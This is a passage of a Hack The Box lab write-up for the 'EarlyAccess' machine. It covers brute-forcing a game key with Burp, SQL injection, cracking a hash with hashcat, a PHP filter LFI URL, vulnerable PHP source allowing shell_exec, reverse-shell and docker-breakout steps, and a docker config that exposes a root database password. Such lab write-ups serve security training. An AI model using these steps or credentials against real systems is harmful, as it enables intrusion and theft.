                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
